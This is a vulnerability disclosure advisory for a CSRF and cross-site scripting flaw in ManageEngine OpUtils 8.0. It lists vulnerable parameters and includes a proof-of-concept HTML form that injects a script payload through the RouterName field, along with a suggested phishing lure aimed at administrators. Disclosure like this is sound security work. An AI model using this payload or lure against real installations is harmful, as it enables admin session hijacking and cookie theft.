================================================== CSRF and XsS In Manage Engine oputils ================================================== . contents:: Table Of Content Overview ======== * Title : CSRF and XSS In Manage Engine OPutils * Author: Kaustubh G. Padwad * Plugin Homepage: https://www.manageengine.com/products/oputils/ * Severity: HIGH * Version Affected: Version 8.0 * Version Tested : Version 8.0 * version patched: Advisory ID ============ 2016-01-Manage_Engine Description =========== About the Product ================= OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more. Vulnerable Parameter -------------------- 1. RouterName 2. action Form 3. selectedSwitchTab 4. ipOrHost 5. alertMsg 6. hostName 7. switchID 8. oidString About Vulnerability ------------------- This Application is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin?s browser can be made t do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= * Add follwing code to webserver and send that malicious link to application Admin. * The admin should be loggedin when he clicks on the link. * Soical enginering might help here For Example :- Device password has been changed click here to reset ####################CSRF COde####################### <html> <body> <form action="http://192.168.1.10:7080/DeviceExplorer.cc"> <input type="hidden" name="RouterName" value="kaus&quot;&gt;&lt;img&#32;src&#61;a&#32;onerror&#61;confirm&#40;&quot;Kaustubh&quot;&#41;&gt;tubh" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Upgrade to next service pack Change Log ========== Disclosure ========== 28-January-2016 Reported to Developer 28-January-2016 Acknodlagement from developer 11-February-2016 Fixed by vendor () credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad